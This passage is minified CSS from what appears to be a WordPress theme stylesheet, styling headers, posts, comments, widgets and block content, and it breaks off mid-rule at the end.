.main-navigation a:after,.site-header.featured-image .main-navigation .main-menu>li.menu-item-has-children:after,.site-header.featured-image .main-navigation li,.site-header.featured-image .social-navigation li,.site-header.featured-image .entry-meta,.site-header.featured-image .entry-title{color:#fff}.site-header.featured-image .main-navigation a,.site-header.featured-image .main-navigation a+svg,.site-header.featured-image .social-navigation a,.site-header.featured-image .site-title a,.site-header.featured-image .site-featured-image a{color:#fff;transition:opacity .11s ease-in-out}.site-header.featured-image .main-navigation a:hover,.site-header.featured-image .main-navigation a:active,.site-header.featured-image .main-navigation a:hover+svg,.site-header.featured-image .main-navigation a:active+svg,.site-header.featured-image .main-navigation a+svg:hover,.site-header.featured-image .main-navigation a+svg:active,.site-header.featured-image .main-navigation a+svg:hover+svg,.site-header.featured-image .main-navigation a+svg:active+svg,.site-header.featured-image .social-navigation a:hover,.site-header.featured-image .social-navigation a:active,.site-header.featured-image .social-navigation a:hover+svg,.site-header.featured-image .social-navigation a:active+svg,.site-header.featured-image .site-title a:hover,.site-header.featured-image .site-title a:active,.site-header.featured-image .site-title a:hover+svg,.site-header.featured-image .site-title a:active+svg,.site-header.featured-image .site-featured-image a:hover,.site-header.featured-image .site-featured-image a:active,.site-header.featured-image .site-featured-image a:hover+svg,.site-header.featured-image .site-featured-image a:active+svg{color:#fff;opacity:.6}.site-header.featured-image .main-navigation a:focus,.site-header.featured-image .main-navigation a:focus+svg,.site-header.featured-image .main-navigation a+svg:focus,.site-header.featured-image .main-navigation a+svg:focus+svg,.site-header.featured-image .social-navigation a:focus,.site-header.featured-image .social-navigation a:focus+svg,.site-header.featured-image .site-title a:focus,.site-header.featured-image .site-title a:focus+svg,.site-header.featured-image .site-featured-image a:focus,.site-header.featured-image .site-featured-image a:focus+svg{color:#fff}.site-header.featured-image .main-navigation .sub-menu a{opacity:inherit}.site-header.featured-image .social-navigation a:focus{color:#fff;opacity:1;border-bottom:1px solid #fff}.site-header.featured-image .social-navigation svg,.site-header.featured-image .site-featured-image svg{-webkit-filter:drop-shadow(0 1px 2px rgba(0,0,0,.35));filter:drop-shadow(0 1px 2px rgba(0,0,0,.35))}.site-header.featured-image .site-featured-image .post-thumbnail img{height:auto;left:50%;max-width:1000%;min-height:100%;min-width:100vw;position:absolute;top:50%;transform:translateX(-50%) translateY(-50%);width:auto;z-index:1}@supports (object-fit:cover){.site-header.featured-image .site-featured-image .post-thumbnail img{height:100%;left:0;object-fit:cover;top:0;transform:none;width:100%}}.image-filters-enabled .site-header.featured-image .site-featured-image .post-thumbnail img{filter:grayscale(100%)}.site-header.featured-image .site-featured-image .entry-header{margin-top:calc(4*1rem);margin-bottom:0;margin-left:0;margin-right:0}@media only screen and (min-width:768px){.site-header.featured-image .site-featured-image .entry-header{margin-left:calc(10% + 60px);margin-right:calc(10% + 60px)}}.site-header.featured-image .site-featured-image .entry-header .entry-title:before{background:#fff}.site-header.featured-image .site-featured-image .entry-header .entry-meta{font-weight:500}.site-header.featured-image .site-featured-image .entry-header .entry-meta>span{margin-right:1rem;display:inline-block}.site-header.featured-image .site-featured-image .entry-header .entry-meta>span:last-child{margin-right:0}.site-header.featured-image .site-featured-image .entry-header .entry-meta a{transition:color .11s ease-in-out;color:currentColor}.site-header.featured-image .site-featured-image .entry-header .entry-meta a:hover{text-decoration:none}.site-header.featured-image .site-featured-image .entry-header .entry-meta .svg-icon{position:relative;display:inline-block;vertical-align:middle;margin-right:.5em}.site-header.featured-image .site-featured-image .entry-header .entry-meta .discussion-avatar-list{display:none}@media only screen and (min-width:768px){.site-header.featured-image .site-featured-image .entry-header.has-discussion .entry-meta{display:flex;position:relative}.site-header.featured-image .site-featured-image .entry-header.has-discussion .entry-title{padding-right:calc(1*(100vw/12) + 1rem)}.site-header.featured-image .site-featured-image .entry-header.has-discussion .entry-meta .comment-count{position:absolute;right:0}.site-header.featured-image .site-featured-image .entry-header.has-discussion .entry-meta .discussion-avatar-list{display:block;position:absolute;bottom:100%}}.site-header.featured-image .custom-logo-link{background:#fff;box-shadow:0 0 0 0 rgba(255,255,255,0)}.site-header.featured-image .custom-logo-link:hover,.site-header.featured-image .custom-logo-link:active,.site-header.featured-image .custom-logo-link:focus{box-shadow:0 0 0 2px #fff}.site-header.featured-image .site-branding{position:relative;z-index:10}.site-header.featured-image .site-featured-image .entry-header{position:relative;z-index:9}.site-header.featured-image .site-branding-container:after,.site-header.featured-image .site-featured-image:before,.site-header.featured-image .site-featured-image:after,.site-header.featured-image:after{display:block;position:absolute;top:0;left:0;content:"\020";width:100%;height:100%}.image-filters-enabled .site-header.featured-image .site-featured-image:before{background:#0073aa;mix-blend-mode:screen;opacity:.1}.site-header.featured-image .site-featured-image:after{background:#000;mix-blend-mode:multiply;opacity:.7}.image-filters-enabled .site-header.featured-image .site-featured-image:after{background:#0073aa;opacity:.8;z-index:3}@supports (mix-blend-mode:multiply){.image-filters-enabled .site-header.featured-image .site-featured-image:after{opacity:1}}.image-filters-enabled .site-header.featured-image .site-branding-container:after{background:rgba(0,0,0,.35);mix-blend-mode:overlay;opacity:.5;z-index:4}@supports (mix-blend-mode:overlay){.image-filters-enabled .site-header.featured-image .site-branding-container:after{background:rgba(255,255,255,.35)}}.site-header.featured-image:after{background:#000;transition:opacity 1.2s ease-in-out;opacity:.7;z-index:5}.image-filters-enabled .site-header.featured-image:after{background:#000e14;opacity:.38}@media only screen and (min-width:768px){.image-filters-enabled .site-header.featured-image:after{opacity:.18}}.site-header.featured-image ::-moz-selection{background:rgba(255,255,255,.17)}.site-header.featured-image ::selection{background:rgba(255,255,255,.17)}.sticky{display:block}.sticky-post{background:#0073aa;color:#fff;display:inline-block;font-weight:700;line-height:1;padding:.25rem;position:absolute;text-transform:uppercase;top:-1rem;z-index:1}.updated:not(.published){display:none}.page-links{clear:both;margin:0 0 calc(1.5*1rem)}.entry{margin-top:calc(6*1rem)}.entry:first-of-type{margin-top:0}.entry .entry-header{margin:calc(3*1rem) 1rem 1rem;position:relative}@media only screen and (min-width:768px){.entry .entry-header{margin:calc(3*1rem) calc(10% + 60px) 1rem}}.entry .entry-title{margin:0}.entry .entry-title:before{background:#767676;content:"\020";display:block;height:2px;margin:1rem 0;width:1em}.entry .entry-title.has-text-align-center:before{margin-left:auto;margin-right:auto}.entry .entry-title.has-text-align-right:before{margin-left:auto}.entry .entry-title a{color:inherit}.entry .entry-title a:hover{color:#4a4a4a}.entry .entry-meta,.entry .entry-footer{color:#767676;font-weight:500}.entry .entry-meta>span,.entry .entry-footer>span{margin-right:1rem;display:inline-block}.entry .entry-meta>span:last-child,.entry .entry-footer>span:last-child{margin-right:0}.entry .entry-meta a,.entry .entry-footer a{transition:color .11s ease-in-out;color:currentColor}.entry .entry-meta a:hover,.entry .entry-footer a:hover{text-decoration:none;color:#0073aa}.entry .entry-meta .svg-icon,.entry .entry-footer .svg-icon{position:relative;display:inline-block;vertical-align:middle;margin-right:.5em}.entry .entry-meta{margin:1rem 0}.entry .entry-footer{margin:calc(2*1rem) 1rem 1rem}@media only screen and (min-width:768px){.entry .entry-footer{margin:1rem calc(10% + 60px) calc(3*1rem);max-width:calc(8*(100vw/12) - 28px)}}@media only screen and (min-width:768px){.entry .entry-footer{max-width:calc(6*(100vw/12) - 28px)}}.entry .post-thumbnail{margin:1rem}@media only screen and (min-width:768px){.entry .post-thumbnail{margin:1rem calc(10% + 60px)}}.entry .post-thumbnail:focus{outline:none}.entry .post-thumbnail .post-thumbnail-inner{display:block}.entry .post-thumbnail .post-thumbnail-inner img{position:relative;display:block;width:100%}.image-filters-enabled .entry .post-thumbnail{position:relative;display:block}.image-filters-enabled .entry .post-thumbnail .post-thumbnail-inner{filter:grayscale(100%)}.image-filters-enabled .entry .post-thumbnail .post-thumbnail-inner:after{background:rgba(0,0,0,.35);content:"";display:block;height:100%;opacity:.5;pointer-events:none;position:absolute;top:0;width:100%;z-index:4}@supports (mix-blend-mode:multiply){.image-filters-enabled .entry .post-thumbnail .post-thumbnail-inner:after{display:none}}.image-filters-enabled .entry .post-thumbnail:before,.image-filters-enabled .entry .post-thumbnail:after{position:absolute;display:block;width:100%;height:100%;top:0;left:0;content:"\020";pointer-events:none}.image-filters-enabled .entry .post-thumbnail:before{background:#0073aa;mix-blend-mode:screen;opacity:.1;z-index:2}.image-filters-enabled .entry .post-thumbnail:after{background:#0073aa;mix-blend-mode:multiply;opacity:.8;z-index:3}@supports (mix-blend-mode:multiply){.image-filters-enabled .entry .post-thumbnail:after{opacity:1}}.entry .entry-content,.entry .entry-summary{max-width:calc(100% - (2*1rem));margin:0 1rem}@media only screen and (min-width:768px){.entry .entry-content,.entry .entry-summary{max-width:80%;margin:0 10%;padding:0 60px}}.entry .entry-content p{word-wrap:break-word}.entry .entry-content .more-link{transition:color .11s ease-in-out;display:inline;color:inherit}.entry .entry-content .more-link:after{content:"\02192";display:inline-block;margin-left:.5em}.entry .entry-content .more-link:hover{color:#0073aa;text-decoration:none}.entry .entry-content a{text-decoration:underline}.entry .entry-content a.button,.entry .entry-content a:hover{text-decoration:none}.entry .entry-content a.button{display:inline-block}.entry .entry-content a.button:hover{background:#111;color:#fff;cursor:pointer}.entry .entry-content>iframe[style]{margin:32px 0 !important;max-width:100% !important}@media only screen and (min-width:768px){.entry .entry-content>iframe[style]{max-width:calc(8*(100vw/12) - 28px) !important}}@media only screen and (min-width:1168px){.entry .entry-content>iframe[style]{max-width:calc(6*(100vw/12) - 28px) !important}}.entry .entry-content .page-links a{margin:calc(.5*1rem);text-decoration:none}.entry .entry-content .wp-audio-shortcode{max-width:calc(100vw - (2*1rem))}@media only screen and (min-width:768px){.entry .entry-content .wp-audio-shortcode{max-width:calc(8*(100vw/12) - 28px)}}@media only screen and (min-width:1168px){.entry .entry-content .wp-audio-shortcode{max-width:calc(6*(100vw/12) - 28px)}}.author-bio{margin:calc(2*1rem) 1rem 1rem}@media only screen and (min-width:768px){.author-bio{max-width:calc(8*(100vw/12) - 28px)}}@media only screen and (min-width:1168px){.author-bio{max-width:calc(6*(100vw/12) - 28px)}}@media only screen and (min-width:768px){.author-bio{margin:calc(3*1rem) calc(10% + 60px)}}@media only screen and (min-width:1168px){.author-bio{margin:calc(3*1rem) calc(10% + 60px)}}.author-bio .author-title{display:inline}.author-bio .author-title:before{background:#767676;content:"\020";display:block;height:2px;margin:1rem 0;width:1em}.author-bio .author-title.has-text-align-center:before{margin-left:auto;margin-right:auto}.author-bio .author-title.has-text-align-right:before{margin-left:auto}.author-bio .author-description{display:inline;color:#767676;font-size:1.125em;line-height:1.2}.author-bio .author-description .author-link{display:inline-block}.author-bio .author-description .author-link:hover{color:#005177;text-decoration:none}.comment-content a{word-wrap:break-word}.bypostauthor{display:block}.comments-area{-webkit-hyphens:auto;-moz-hyphens:auto;-ms-hyphens:auto;hyphens:auto;margin:calc(2*1rem) 1rem;word-wrap:break-word}@media only screen and (min-width:768px){.comments-area{max-width:calc(8*(100vw/12) - 28px)}}@media only screen and (min-width:1168px){.comments-area{max-width:calc(6*(100vw/12) - 28px)}}@media only screen and (min-width:768px){.comments-area{margin:calc(3*1rem) calc(10% + 60px)}}.comments-area>*{margin-top:calc(2*1rem);margin-bottom:calc(2*1rem)}@media only screen and (min-width:768px){.comments-area>*{margin-top:calc(3*1rem);margin-bottom:calc(3*1rem)}}.entry+.comments-area{margin-top:calc(3*1rem)}@media only screen and (min-width:768px){.comments-area .comments-title-wrap{align-items:baseline;display:flex;justify-content:space-between}}.comments-area .comments-title-wrap .comments-title{margin:0}.comments-area .comments-title-wrap .comments-title:before{background:#767676;content:"\020";display:block;height:2px;margin:1rem 0;width:1em}.comments-area .comments-title-wrap .comments-title.has-text-align-center:before{margin-left:auto;margin-right:auto}.comments-area .comments-title-wrap .comments-title.has-text-align-right:before{margin-left:auto}@media only screen and (min-width:768px){.comments-area .comments-title-wrap .comments-title{flex:1 0 calc(3*(100vw/12))}}@media only screen and (min-width:768px){.comments-area .comments-title-wrap .discussion-meta{flex:0 0 calc(2*(100vw/12));margin-left:1rem}}#comment{max-width:100%;box-sizing:border-box}#respond{position:relative}#respond .comment-user-avatar{margin:1rem 0 -1rem}#respond .comment .comment-form{padding-left:0}#respond>small{display:block;font-size:22px;position:absolute;left:calc(1rem + 100%);top:calc(-3.5*1rem);width:calc(100vw/12)}#comments>.comments-title:last-child{display:none}.comment-form-flex{display:flex;flex-direction:column}.comment-form-flex .comments-title{display:none;margin:0;order:1}.comment-form-flex #respond{order:2}.comment-form-flex #respond+.comments-title{display:block}.comment-list{list-style:none;padding:0}.comment-list .children{margin:0;padding:0 0 0 1rem}.comment-list>.comment:first-child{margin-top:0}.comment-list .pingback .comment-body,.comment-list .trackback .comment-body{color:#767676;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI","Roboto","Oxygen","Ubuntu","Cantarell","Fira Sans","Droid Sans","Helvetica Neue",sans-serif;font-size:.71111em;font-weight:500;margin-top:1rem;margin-bottom:1rem}.comment-list .pingback .comment-body a:not(.comment-edit-link),.comment-list .trackback .comment-body a:not(.comment-edit-link){font-weight:700;font-size:19.55556px;line-height:1.5;padding-right:.5rem;display:block}.comment-list .pingback .comment-body .comment-edit-link,.comment-list .trackback .comment-body .comment-edit-link{color:#767676;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI","Roboto","Oxygen","Ubuntu","Cantarell","Fira Sans","Droid Sans","Helvetica Neue",sans-serif;font-weight:500}#respond+.comment-reply{display:none}.comment-reply .comment-reply-link{display:inline-block}.comment{list-style:none;position:relative}@media only screen and (min-width:768px){.comment{padding-left:calc(.5*(1rem + calc(100vw/12)))}.comment.depth-1,.comment .children{padding-left:0}.comment.depth-1{margin-left:calc(3.25*1rem)}}.comment .comment-body{margin:calc(2*1rem) 0 0}.comment .comment-meta{position:relative}.comment .comment-author .avatar{float:left;margin-right:1rem;position:relative}@media only screen and (min-width:768px){.comment .comment-author .avatar{float:inherit;margin-right:inherit;position:absolute;top:0;right:calc(100% + 1rem)}}.comment .comment-author .fn{position:relative;display:block}.comment .comment-author .fn a{color:inherit}.comment .comment-author .fn a:hover{color:#005177}.comment .comment-author .post-author-badge{border-radius:100%;display:block;height:18px;position:absolute;background:#008fd3;right:calc(100% - 2.5rem);top:-3px;width:18px}@media only screen and (min-width:768px){.comment .comment-author .post-author-badge{right:calc(100% + .75rem)}}.comment .comment-author .post-author-badge svg{width:inherit;height:inherit;display:block;fill:#fff;transform:scale(.875)}.comment .comment-metadata>a,.comment .comment-metadata .comment-edit-link{display:inline;font-weight:500;color:#767676;vertical-align:baseline}.comment .comment-metadata>a time,.comment .comment-metadata .comment-edit-link time{vertical-align:baseline}.comment .comment-metadata>a:hover,.comment .comment-metadata .comment-edit-link:hover{color:#005177;text-decoration:none}.comment .comment-metadata>*{display:inline-block}.comment .comment-metadata .edit-link-sep{color:#767676;margin:0 .2em;vertical-align:baseline}.comment .comment-metadata .edit-link{color:#767676}.comment .comment-metadata .edit-link svg{transform:scale(.8);vertical-align:baseline;margin-right:.1em}.comment .comment-metadata .comment-edit-link{position:relative;padding-left:1rem;margin-left:-1rem;z-index:1}.comment .comment-metadata .comment-edit-link:hover{color:#0073aa}.comment .comment-content{margin:1rem 0}@media only screen and (min-width:1168px){.comment .comment-content{padding-right:1rem}}.comment .comment-content>*:first-child{margin-top:0}.comment .comment-content>*:last-child{margin-bottom:0}.comment .comment-content blockquote{margin-left:0}.comment .comment-content a{text-decoration:underline}.comment .comment-content a:hover{text-decoration:none}.comment-reply-link,#cancel-comment-reply-link{font-weight:500}.comment-reply-link:hover,#cancel-comment-reply-link:hover{color:#005177}.discussion-avatar-list{content:"";display:table;table-layout:fixed;margin:0;padding:0}.discussion-avatar-list li{position:relative;list-style:none;margin:0 -8px 0 0;padding:0;float:left}.discussion-avatar-list .comment-user-avatar img{height:calc(1.5*1rem);width:calc(1.5*1rem)}.discussion-meta .discussion-meta-info{margin:0}.discussion-meta .discussion-meta-info .svg-icon{vertical-align:middle;fill:currentColor;transform:scale(.6) scaleX(-1) translateY(-.1em);margin-left:-.25rem}.comment-form .comment-notes,.comment-form label{font-family:-apple-system,BlinkMacSystemFont,"Segoe UI","Roboto","Oxygen","Ubuntu","Cantarell","Fira Sans","Droid Sans","Helvetica Neue",sans-serif;font-size:.71111em;color:#767676}.comment-form #wp-comment-cookies-consent{margin:0 10px 0 0}@media only screen and (min-width:768px){.comment-form .comment-form-author,.comment-form .comment-form-email{width:calc(50% - .5rem);float:left}}@media only screen and (min-width:768px){.comment-form .comment-form-email{margin-left:1rem}}.comment-form input[name=author],.comment-form input[name=email],.comment-form input[name=url]{display:block;width:100%}.archive .page-header,.search .page-header,.error404 .page-header{margin:1rem 1rem calc(3*1rem)}@media only screen and (min-width:768px){.archive .page-header,.search .page-header,.error404 .page-header{margin:0 calc(10% + 60px) calc(3*1rem)}}.archive .page-header .page-title,.search .page-header .page-title,.error404 .page-header .page-title{color:#767676;display:inline;letter-spacing:normal}.archive .page-header .page-title:before,.search .page-header .page-title:before,.error404 .page-header .page-title:before{display:none}.archive .page-header .search-term,.archive .page-header .page-description,.search .page-header .search-term,.search .page-header .page-description,.error404 .page-header .search-term,.error404 .page-header .page-description{display:inherit;clear:both}.archive .page-header .page-description,.search .page-header .page-description{display:block;color:#111;font-size:1em}@media only screen and (min-width:768px){.hfeed .entry .entry-header{margin:calc(3*1rem) calc(10% + 60px) calc(1rem/2)}}.error-404.not-found .page-content,.no-results.not-found .page-content{margin:calc(3*1rem) 1rem}@media only screen and (min-width:768px){.error-404.not-found .page-content,.no-results.not-found .page-content{margin:calc(3*1rem) calc(10% + 60px) calc(1rem/2)}}.error-404.not-found .search-submit,.no-results.not-found .search-submit{vertical-align:middle;margin:1rem 0}.error-404.not-found .search-field,.no-results.not-found .search-field{width:100%}#colophon .widget-area,#colophon .site-info{margin:calc(2*1rem) 1rem}@media only screen and (min-width:768px){#colophon .widget-area,#colophon .site-info{margin:calc(3*1rem) calc(10% + 60px)}}#colophon .widget-column{display:flex;flex-wrap:wrap}#colophon .widget-column .widget{-webkit-hyphens:auto;-moz-hyphens:auto;-ms-hyphens:auto;hyphens:auto;width:100%;word-wrap:break-word}@media only screen and (min-width:1168px){#colophon .widget-column .widget{margin-right:calc(3*1rem);width:calc(50% - (3*1rem))}}#colophon .site-info{color:#767676;-webkit-hyphens:auto;-moz-hyphens:auto;-ms-hyphens:auto;hyphens:auto;word-wrap:break-word}#colophon .site-info a{color:inherit}#colophon .site-info a:hover{text-decoration:none;color:#0073aa}#colophon .site-info .imprint,#colophon .site-info .privacy-policy-link{margin-right:1rem}.widget{margin:0 0 1rem}.widget .widget-title{font-size:1.6875em}.widget select{max-width:100%}.widget a{color:#0073aa}.widget a:hover{color:#005177}.widget_archive ul,.widget_categories ul,.widget_meta ul,.widget_nav_menu ul,.widget_pages ul,.widget_recent_comments ul,.widget_recent_entries ul,.widget_rss ul{padding:0;list-style:none}.widget_archive ul li,.widget_categories ul li,.widget_meta ul li,.widget_nav_menu ul li,.widget_pages ul li,.widget_recent_comments ul li,.widget_recent_entries ul li,.widget_rss ul li{color:#767676;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI","Roboto","Oxygen","Ubuntu","Cantarell","Fira Sans","Droid Sans","Helvetica Neue",sans-serif;font-size:calc(22px*1.125);font-weight:700;line-height:1.2;margin-top:.5rem;margin-bottom:.5rem}.widget_archive ul ul,.widget_categories ul ul,.widget_meta ul ul,.widget_nav_menu ul ul,.widget_pages ul ul,.widget_recent_comments ul ul,.widget_recent_entries ul ul,.widget_rss ul ul{counter-reset:submenu}.widget_archive ul ul>li>a:before,.widget_categories ul ul>li>a:before,.widget_meta ul ul>li>a:before,.widget_nav_menu ul ul>li>a:before,.widget_pages ul ul>li>a:before,.widget_recent_comments ul ul>li>a:before,.widget_recent_entries ul ul>li>a:before,.widget_rss ul ul>li>a:before{font-family:"NonBreakingSpaceOverride","Hoefler Text",Garamond,"Times New Roman",serif;font-weight:400;content:"– " counters(submenu,"– ",none);counter-increment:submenu}.widget_tag_cloud .tagcloud{font-family:-apple-system,BlinkMacSystemFont,"Segoe UI","Roboto","Oxygen","Ubuntu","Cantarell","Fira Sans","Droid Sans","Helvetica Neue",sans-serif;font-weight:700}.widget_search .search-field{width:100%}@media only screen and (min-width:600px){.widget_search .search-field{width:auto}}.widget_search .search-submit{display:block;margin-top:1rem}.widget_calendar .calendar_wrap{text-align:center}.widget_calendar .calendar_wrap table td,.widget_calendar .calendar_wrap table th{border:none}.widget_calendar .calendar_wrap a{text-decoration:underline}.widget_calendar .calendar_wrap .wp-calendar-table{margin-bottom:0}.widget_calendar .calendar_wrap .wp-calendar-nav{margin:0 0 1rem;display:table;width:100%;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI","Roboto","Oxygen","Ubuntu","Cantarell","Fira Sans","Droid Sans","Helvetica Neue",sans-serif}.widget_calendar .calendar_wrap .wp-calendar-nav span{display:table-cell;padding:.5em}.widget_calendar .calendar_wrap .wp-calendar-nav-prev,.widget_calendar .calendar_wrap .wp-calendar-nav-next{width:40%}.entry .entry-content>*,.entry .entry-summary>*,.entry .entry-summary>.wp-block-group>.wp-block-group__inner-container>*,.entry .entry-content>.wp-block-group>.wp-block-group__inner-container>*{margin:32px 0;max-width:100%}@media only screen and (min-width:768px){.entry .entry-content>*,.entry .entry-summary>*,.entry .entry-summary>.wp-block-group>.wp-block-group__inner-container>*,.entry .entry-content>.wp-block-group>.wp-block-group__inner-container>*{max-width:calc(8*(100vw/12) - 28px)}}@media only screen and (min-width:1168px){.entry .entry-content>*,.entry .entry-summary>*,.entry .entry-summary>.wp-block-group>.wp-block-group__inner-container>*,.entry .entry-content>.wp-block-group>.wp-block-group__inner-container>*{max-width:calc(6*(100vw/12) - 28px)}}@media only screen and (min-width:768px){.entry .entry-content>*,.entry .entry-summary>*,.entry .entry-summary>.wp-block-group>.wp-block-group__inner-container>*,.entry .entry-content>.wp-block-group>.wp-block-group__inner-container>*{margin:32px 0}}.entry .entry-content>*.alignwide,.entry .entry-summary>*.alignwide,.entry .entry-summary>.wp-block-group>.wp-block-group__inner-container>*.alignwide,.entry .entry-content>.wp-block-group>.wp-block-group__inner-container>*.alignwide{margin-left:auto;margin-right:auto;clear:both}@media only screen and (min-width:768px){.entry .entry-content>*.alignwide,.entry .entry-summary>*.alignwide,.entry .entry-summary>.wp-block-group>.wp-block-group__inner-container>*.alignwide,.entry .entry-content>.wp-block-group>.wp-block-group__inner-container>*.alignwide{width:100%;max-width:100%}}.entry .entry-content>*.alignfull,.entry .entry-summary>*.alignfull,.entry .entry-summary>.wp-block-group>.wp-block-group__inner-container>*.alignfull,.entry .entry-content>.wp-block-group>.wp-block-group__inner-container>*.alignfull{position:relative;left:-1rem;width:calc(100% + (2*1rem));max-width:calc(100% + (2*1rem));clear:both}@media only screen and (min-width:768px){.entry .entry-content>*.alignfull,.entry .entry-summary>*.alignfull,.entry .entry-summary>.wp-block-group>.wp-block-group__inner-container>*.alignfull,.entry .entry-content>.wp-block-group>.wp-block-group__inner-container>*.alignfull{margin-top:calc(2*1rem);margin-bottom:calc(2*1rem);left:calc(-12.5% - 75px);width:calc(125% + 150px);max-width:calc(125% + 150px)}}.entry .entry-content>*.alignleft,.entry .entry-summary>*.alignleft,.entry .entry-summary>.wp-block-group>.wp-block-group__inner-container>*.alignleft,.entry .entry-content>.wp-block-group>.wp-block-group__inner-container>*.alignleft{float:left;max-width:calc(5*(100vw/12));margin-top:0;margin-left:0;margin-right:1rem}@media only screen and (min-width:768px){.entry .entry-content>*.alignleft,.entry .entry-summary>*.alignleft,.entry .entry-summary>.wp-block-group>.wp-block-group__inner-container>*.alignleft,.entry .entry-content>.wp-block-group>.wp-block-group__inner-container>*.alignleft{max-width:calc(4*(100vw/12));margin-right:calc(2*1rem)}}.entry .entry-content>*.alignright,.entry .entry-summary>*.alignright,.entry .entry-summary>.wp-block-group>.wp-block-group__inner-container>*.alignright,.entry .entry-content>.wp-block-group>.wp-block-group__inner-container>*.alignright{float:right;max-width:calc(5*(100vw/12));margin-top:0;margin-right:0;margin-left:1rem}@media only screen and (min-width:768px){.entry .entry-content>*.alignright,.entry .entry-summary>*.alignright,.entry .entry-summary>.wp-block-group>.wp-block-group__inner-container>*.alignright,.entry .entry-content>.wp-block-group>.wp-block-group__inner-container>*.alignright{max-width:calc(4*(100vw/12));margin-right:0;margin-left:calc(2*1rem)}}.entry .entry-content>*.aligncenter,.entry .entry-summary>*.aligncenter,.entry .entry-summary>.wp-block-group>.wp-block-group__inner-container>*.aligncenter,.entry .entry-content>.wp-block-group>.wp-block-group__inner-container>*.aligncenter{margin-left:auto;margin-right:auto}@media only screen and (min-width:768px){.entry .entry-content>*.aligncenter,.entry .entry-summary>*.aligncenter,.entry .entry-summary>.wp-block-group>.wp-block-group__inner-container>*.aligncenter,.entry .entry-content>.wp-block-group>.wp-block-group__inner-container>*.aligncenter{max-width:calc(8*(100vw/12) - 28px)}}@media only screen and (min-width:1168px){.entry .entry-content>*.aligncenter,.entry .entry-summary>*.aligncenter,.entry .entry-summary>.wp-block-group>.wp-block-group__inner-container>*.aligncenter,.entry .entry-content>.wp-block-group>.wp-block-group__inner-container>*.aligncenter{max-width:calc(6*(100vw/12) - 28px)}}@media only screen and (min-width:768px){.entry .entry-content>*.aligncenter,.entry .entry-summary>*.aligncenter,.entry .entry-summary>.wp-block-group>.wp-block-group__inner-container>*.aligncenter,.entry .entry-content>.wp-block-group>.wp-block-group__inner-container>*.aligncenter{margin-left:0;margin-right:0}}.entry .entry-content>*>*:first-child,.entry .entry-summary>*>*:first-child{margin-top:0}.entry .entry-content>*>*:last-child,.entry .entry-summary>*>*:last-child{margin-bottom:0}.entry .entry-content .entry-content,.entry .entry-content .entry-summary,.entry .entry-content .entry,.entry .entry-summary .entry-content,.entry .entry-summary .entry-summary,.entry .entry-summary .entry{margin:inherit;max-width:inherit;padding:inherit}@media only screen and (min-width:768px){.entry .entry-content .entry-content,.entry .entry-content .entry-summary,.entry .entry-content .entry,.entry .entry-summary .entry-content,.entry .entry-summary .entry-summary,.entry .entry-summary .entry{margin:inherit;max-width:inherit;padding:inherit}}.entry .entry-content p.has-background{padding:20px 30px}.entry .entry-content .wp-block-audio{width:100%}.entry .entry-content .wp-block-audio audio{width:100%}.entry .entry-content .wp-block-audio.alignleft audio,.entry .entry-content .wp-block-audio.alignright audio{max-width:198px}@media only screen and (min-width:768px){.entry .entry-content .wp-block-audio.alignleft audio,.entry .entry-content .wp-block-audio.alignright audio{max-width:384px}}@media only screen and (min-width:1379px){.entry .entry-content .wp-block-audio.alignleft audio,.entry .entry-content .wp-block-audio.alignright audio{max-width:385.44px}}.entry .entry-content .wp-block-video video{width:100%}.entry .entry-content .wp-block-button .wp-block-button__link{transition:background .15s ease-in-out;border:none;font-size:.88889em;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI","Roboto","Oxygen","Ubuntu","Cantarell","Fira Sans","Droid Sans","Helvetica Neue",sans-serif;line-height:1.2;box-sizing:border-box;font-weight:700;text-decoration:none;padding:.76rem 1rem;outline:none;outline:none}.entry .entry-content .wp-block-button .wp-block-button__link:not(.has-background){background-color:#0073aa}.entry .entry-content .wp-block-button .wp-block-button__link:not(.has-text-color){color:#fff}.entry .entry-content .wp-block-button .wp-block-button__link:hover{color:#fff;background:#111;cursor:pointer}.entry .entry-content .wp-block-button .wp-block-button__link:focus{color:#fff;background:#111;outline:thin dotted;outline-offset:-4px}.entry .entry-content .wp-block-button:not(.is-style-squared) .wp-block-button__link{border-radius:5px}.entry .entry-content .wp-block-button.is-style-outline .wp-block-button__link,.entry .entry-content .wp-block-button.is-style-outline .wp-block-button__link:focus,.entry .entry-content .wp-block-button.is-style-outline .wp-block-button__link:active{transition:all .15s ease-in-out;border-width:2px;border-style:solid}.entry .entry-content .wp-block-button.is-style-outline .wp-block-button__link:not(.has-background),.entry .entry-content .wp-block-button.is-style-outline .wp-block-button__link:focus:not(.has-background),.entry .entry-content .wp-block-button.is-style-outline .wp-block-button__link:active:not(.has-background){background:0 0}.entry .entry-content .wp-block-button.is-style-outline .wp-block-button__link:not(.has-text-color),.entry .entry-content .wp-block-button.is-style-outline .wp-block-button__link:focus:not(.has-text-color),.entry .entry-content .wp-block-button.is-style-outline .wp-block-button__link:active:not(.has-text-color){color:#0073aa;border-color:currentColor}.entry .entry-content .wp-block-button.is-style-outline .wp-block-button__link:hover{color:#fff;border-color:#111}.entry .entry-content .wp-block-button.is-style-outline .wp-block-button__link:hover:not(.has-background){color:#111}.entry .entry-content .wp-block-archives,.entry .entry-content .wp-block-categories,.entry .entry-content .wp-block-latest-posts{padding:0;list-style:none}.entry .entry-content .wp-block-archives li>a,.entry .entry-content .wp-block-categories li>a,.entry .entry-content .wp-block-latest-posts li>a{font-family:-apple-system,BlinkMacSystemFont,"Segoe UI","Roboto","Oxygen","Ubuntu","Cantarell","Fira Sans","Droid Sans","Helvetica Neue",sans-serif;font-size:calc(22px*1.125);font-weight:700;line-height:1.2;text-decoration:none}.entry .entry-content .wp-block-archives.aligncenter,.entry .entry-content .wp-block-categories.aligncenter{text-align:center}.entry .entry-content .wp-block-categories ul{padding-top:.75rem}.entry .entry-content .wp-block-categories li ul{list-style:none;padding-left:0}.entry .entry-content .wp-block-categories ul{counter-reset:submenu}.entry .entry-content .wp-block-categories ul>li>a:before{font-family:"NonBreakingSpaceOverride","Hoefler Text",Garamond,"Times New Roman",serif;font-weight:400;content:"– " counters(submenu,"– ",none);counter-increment:submenu}.entry .entry-content .wp-block-latest-posts .wp-block-latest-posts__post-date{font-family:-apple-system,BlinkMacSystemFont,"Segoe UI","Roboto","Oxygen","Ubuntu","Cantarell","Fira Sans","Droid 